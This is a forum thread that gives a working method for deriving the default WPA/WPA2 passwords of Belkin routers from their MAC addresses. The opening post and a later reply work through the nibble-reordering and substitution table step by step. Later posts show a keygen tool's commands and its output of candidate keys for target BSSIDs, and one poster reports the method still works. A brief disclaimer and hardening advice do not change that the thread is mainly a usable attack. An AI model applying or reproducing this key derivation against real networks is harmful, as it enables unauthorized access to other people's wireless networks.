Results 1 to 21 of 21

Thread: Belkin SSID and WPA/WPA2 correlation.

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    Belkin Mac Address and WPA/WPA2 key correlation: CRACKED!

    Please do not use this on a network you do not own! I am not responsible for what you do with this information! This is just to demonstrate Belkin's SEVERE security flaw and it doesn't look like they're going to fix the issue.

    I do not own this information. All information is from this PDF, and all credit goes to Numlock. Eftecno posted this in a comment below but it is in Italian and a bit hard to follow so I'll do an example here.

    The most common SSID you will see is belkin.xxx, so I'll do an example for that. Here are the steps:

    1.) Find the wlan mac address of the target router. In this case, I'll pull one from ebay (looked at the pictures): 08:86:3B:05:3A:41 I don't know how long this listing will last and I hope I don't break any rules but just to prove that this works there is the listing. Look at the shipping price, too! ;D

    2.) Add 1 to the end of the mac address: 08:86:3B:05:3A:42

    3.) Remove the first 2 pairs from the mac address (08:86), so you're left with 3B:05:3A:42

    4.) Take the 8 characters in the mac address and rearrange them so they are in this order: 62:38:51:74. So 3B:05:3A:42 would change to AB023345.

    5.) Use this conversion chart and replace the corresponding values we just calculated, AB023345.
    Code:
    0123456789ABCDEF
    944626378ace9bdf
    So,
    Code:
    A = c
    B = e
    0 = 9
    2 = 4
    3 = 6
    3 = 6
    4 = 2
    5 = 6
    The password is ce946626

    Try yours yourself now!

    Also, have a look at the PDF above. There are other algorithms for other models and a few special cases for each algorithm if one doesn't work.

    An online tool is availible here.

    If you own a Belkin router, I HIGHLY recommend that you change the default password and SSID. Don't worry about mac address filtering or hiding your SSID, those can be easily overcome. Also, disable WPS if you can, although most of the routers feature a 3 pin max failure so if you try and fail 3 times, it locks WPS until the unit is rebooted.

    Still having trouble? Have a look a BigJim's comment on page 2, his post may be able to help you out if you're stuck!

    Good luck!
    Last edited by soxrok2212; 2015-08-28 at 22:14. Reason: typo

  2. #2
    Join Date
    2013-Sep
    Posts
    264
    that is not (almost) completely different but pretty close

    four 6 on one side and three 6 on the other one. And then very closed leter, 2 d and one c.... there is a table of conversion and a movement like in a array here, i guess.
    You should maybe try to check the serial and cee if that doesn't help to make sense.

    i think there is something here, good luck

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by kcdtv View Post
    that is not (almost) completely different but pretty close

    four 6 on one side and three 6 on the other one. And then very closed leter, 2 d and one c.... there is a table of conversion and a movement like in a array here, i guess.
    You should maybe try to check the serial and cee if that doesn't help to make sense.

    i think there is something here, good luck
    Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml

    Anyways, I was thinking they were different because I was looking at them in pairs of 2, ex: [55][66][66][77] and [56][66][67][78]. So the pairs don't match up but I'll look into it. I don't think it has anything to do with the serial numbers because according to the news post, they were able to recover the password strictly from the mac address. Thanks for the reply though!

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Anyone have any ideas???

  5. #5
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I stumped... no idea where to look for more info...

  6. #6
    Join Date
    2013-Sep
    Posts
    264
    Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml
    No
    aparently they simply didn't find anything, this post is year old and they simply didn't find the stuff
    They were not able to see that the PIN WPS is made on the bssid in a straight relationship as I revealed more than one year ago WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

    For me it is total bullshiting when they pretend to have the algorithm.
    They are as closed as you.
    Isn't it strange to to present something and than say just after " anyway guys, with 8 caracters hex, this can be bruteforced if you have
    a good card"
    Thanks for the news !!!!
    bullshit.!!!

    So they seem to don't say what they know, concerned by the bad use that can be made xith their discover
    But on the other hand give this kind of information " buy a good card and you can break the defaukt password even if we are wrong"

    Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [1]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.
    That make absolutely no sense to do not demonstarte what you pretend to have discovered but then say this obvious ****.
    Anyway, if you say something; demonstrate it otherwise go to ****, i am not use to believe people that tell me that something is like this but refuse to demonstrate it, this is not theology but computers.
    Calling them searcher is a joke, for telling us that with oldashcat and last ATI we get 100000 password/seconds...
    Calling this a full disclosure is a joke too

    Good luck in your project because there is still something to do about this routers, with the last N models that seems to use the same algorithm but with a 16 digits passphrase.

    that the original by the way : http://www.jakoblell.com/blog/2012/1...eless-routers/
    Last edited by kcdtv; 2013-11-03 at 16:51.

  7. #7
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by kcdtv View Post
    I actually e-mailed Jakob Lell and he said that he decided not to release the tables to the public...

    Anyways, I tried chopping down this post to make it sweeter but it gave me an error, I'll try again later.

  8. #8
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    double post - oops
    Last edited by soxrok2212; 2015-08-28 at 22:15.

  9. #9
    Join Date
    2013-Sep
    Posts
    264
    I don't know man, i don't beleive at all taht they found the algorithm... if so anyway it is still to be revealed and all credits will go to the one that speaks.
    It is still impossible for me to understand the fact that on the one hand you give a way to break it buy buying a video card and on the other hand the only thing that is interesting and that you need to expose to prov something you do not reveals keep for some obscure reason
    they have stock options in amd or what?
    This man is asking us to believe him on word and that not how it works, sorry for him, that's a hard world
    Don't give up
    Last edited by kcdtv; 2013-11-03 at 22:07.

  10. #10
    Join Date
    2014-Feb
    Posts
    1
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html

  11. #11
    Join Date
    2014-Mar
    Posts
    2
    Quote Originally Posted by eftecno View Post
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html
    Great! thanks for sharing

  12. #12
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by eftecno View Post
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html
    I'm having trouble following the equation, specifically this part:

    Code:
    MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
     08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667
    I don't understand what happens here. Any ideas? Thanks for the post though!

  13. #13
    Join Date
    2014-Mar
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    I'm having trouble following the equation, specifically this part:

    Code:
    MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
     08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667
    I don't understand what happens here. Any ideas? Thanks for the post though!

    You can't know the MAC but you can calculate it MAC = WLAN +1
    or in special cases MAC = WLAN MAC +2

    08:86:3B:B7:39:2F + 1 = 08:86:3B:B7:39:30

    order according to the sequence

    Code:
    MAC __:__:62:38:51:74 12345678
        08:86:3B:B7:39:30 
    
    MAC __:__:  :  : 1:   12345678  
        08:86:  :  : 9:   9        
    
    MAC __:__: 2:  :  :   12345678 
        08:86: B:  :  :   9B      
    
    MAC __:__:  :3 :  :   12345678 
        08:86:  :B :  :   9BB
    
    MAC __:__:  :  :  : 4 12345678  
        08:86:  :  :  : 0 9BB0
    
    MAC __:__:  :  :5 :   12345678  
        08:86:  :  :3 :   9BB03        
    
    MAC __:__:6 :  :  :   12345678 
        08:86:3 :  :  :   9BB033      
    
    MAC __:__:  :  :  :7  12345678 
        08:86:  :  :  :3  9BB0333
    
    MAC __:__:  : 8:  :   12345678  
        08:86:  : 7:  :   9BB03337
    then replace the values

    Code:
    0123456789ABCDEF 9BB03337
    944626378ace9bdf 
    
    0123456789ABCDEF 9BB03337 
             a       a 
    
    0123456789ABCDEF 9BB03337 
               e     ae
    
    0123456789ABCDEF 9BB03337 
               e     aee
    
    0123456789ABCDEF 9BB03337 
    9                aee9
    
    0123456789ABCDEF 9BB03337 
       6             aee96 
    
    0123456789ABCDEF 9BB03337 
       6             aee966
    
    0123456789ABCDEF 9BB03337 
       6             aee9666
    
    0123456789ABCDEF 9BB03337 
           7         aee96667
    enjoy

  14. #14
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Thanks I figured it out last night before I check on here but thanks for the post! I updated the original post too and I'll reference you!

  15. #15
    Join Date
    2013-Jul
    Posts
    841
    For those that want to read the original document the following Italian to English is provided:

    caratteri character
    esadecimale hexadecimal
    maiuscolo uppercase
    conversione conversion
    ordine order
    modelli models
    casi particolari special cases

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Tested this on some Ebay listings, it works! Anyone else have any success?

  17. #17
    Join Date
    2014-Apr
    Posts
    8
    Here you go a proof-of-concept by using the PDF :


    https://bitbucket.org/dudux/belkin4xx


    If you find out bugs or something, let me know via email.

    $ python belkin4xx.py -h
    usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
    [-a | -l]

    >>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
    with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
    likely vulnerable, although routers using those macaddresses could be
    vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es

    optional arguments:
    -h, --help show this help message and exit
    -v, --version show program's version number and exit
    -w [WORDLIST], --wordlist [WORDLIST]
    Filename to store keys
    -a, --allkeys Create all possible cases. Definitely recommended if
    first attempt fails
    -l, --list List all vulnerable mac address so far

    required:
    -b [BSSID], --bssid [BSSID]
    Target bssid
    -e [ESSID], --essid [ESSID]
    Target essid. [BelkinXXXX,belkin.XXXX]

    (+) Help: python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de


    $ python belkin4xx.py -l
    [+] Possible vulnerable targets so far:

    essid: Belkin.XXXX
    essid: Belkin_XXXXXX
    essid: belkin.xxxx
    essid: belkin.xxx

    bssid: 94:44:52:uv:wx:yz
    bssid: 08:86:3B:uv:wx:yz
    bssid: EC:1A:59:uv:wx:yz

    $ python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de
    [+] Your WPA key might be :
    040D93B0

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
    [+] Your WPA key might be :
    d49496b9

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
    [+] Your WPA keys might be :
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0


    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
    $ cat keys.txt
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0
    Last edited by dudux; 2014-05-06 at 21:53.

  18. #18
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by dudux View Post
    Here you go a proof-of-concept by using the PDF :


    https://bitbucket.org/dudux/belkin4xx


    If you find out bugs or something, let me know via email.
    This is awesome! Can you share install instructions?

  19. #19
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    This is awesome! Can you share install instructions?
    Try this:

    python belkin4xx.py -b 94:44:52:00:C0:EF -e Belkin.c0de

  20. #20
    Join Date
    2014-Apr
    Posts
    8
    You can run it on Windows,MacOSx or any Linux.

    For instance on debian/Ubuntu systems:

    $ sudo apt-get install git
    $ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git

    And read the usage.

    p.s.- if you can help me out to make it more accurate......... Just send me data.

    UPDATED: More accurate and fixes
    $ python belkin4xx.py -v
    belkin4xx.py 1.4 [2014-05-06]
    Last edited by dudux; 2014-05-06 at 21:51.

  21. #21
    Join Date
    2016-Aug
    Posts
    1
    Sorry for the gravedig, but I just wanna let everyone know that this still works. I just tested it on a belkin.xxx network.

Similar Threads

  1. I want to capture just a list of clients with no associated SSID
    By speckled_jim in forum General Archive
    Replies: 0
    Last Post: 2014-09-10, 21:49
  2. How to hack a Belkin Belkin N450 routers home page.
    By shaberu in forum How-To Archive
    Replies: 1
    Last Post: 2014-02-03, 19:40
  3. Aireplay-ng Hidden SSID deauth problem
    By polyphemus in forum General Archive
    Replies: 5
    Last Post: 2013-11-26, 17:56

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •